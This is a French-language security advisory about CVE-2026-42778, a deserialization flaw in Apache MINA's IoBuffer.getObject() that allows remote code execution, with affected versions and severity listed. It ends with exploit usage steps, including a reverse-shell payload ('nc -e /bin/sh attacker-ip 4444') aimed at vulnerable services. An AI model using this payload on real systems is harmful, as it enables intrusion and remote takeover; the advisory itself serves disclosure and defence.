
CVE-2026-42778 EUVD-2026-26492 Désérialisation de données non fiables (CWE-502)
Correctif incomplet dans la méthode AbstractIoBuffer.getObject() d'Apache MINA. La validation de la liste blanche des noms de classes, qui restreint les classes pouvant être désérialisées, est appliquée trop tard, après que les initialiseurs statiques des classes en cours de lecture aient pu s'exécuter. Cela se produit car le correctif d'origine pour CVE-2024-52046 n'a pas été correctement appliqué aux branches 2.1.X et 2.2.X. Versions concernées : - Apache MINA 2.1.0 à 2.1.11 - Apache MINA 2.2.0 à 2.2.6
ID CVE : CVE-2026-42778
Publié : 05/01/2026
Impact : Critique
Disponibilité de l'exploit : Non public, uniquement privé.
CVSS : 9.8
Correctif disponible : (Aucun correctif officiel pour l'instant)
Un attaquant peut créer des objets sérialisés malveillants qui, lorsqu'ils sont traités par IoBuffer.getObject(), exécutent du code arbitraire via des initialiseurs statiques avant que la validation de la liste blanche des noms de classes ne soit effectuée. Étant donné qu'il s'agit d'une vulnérabilité accessible via le réseau ne nécessitant aucun privilège ni interaction de l'utilisateur, l'exécution de code à distance est possible pour toute application utilisant Apache MINA qui appelle la méthode IoBuffer.getObject(). La vulnérabilité permet une compromission totale de la confidentialité, de l'intégrité et de la disponibilité des systèmes concernés.
# Compiler et générer
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# Envoyer sur le réseau au service basé sur MINA utilisant ObjectSerializationCodecFactory
# ou à tout point de terminaison qui appelle IoBuffer.getObject()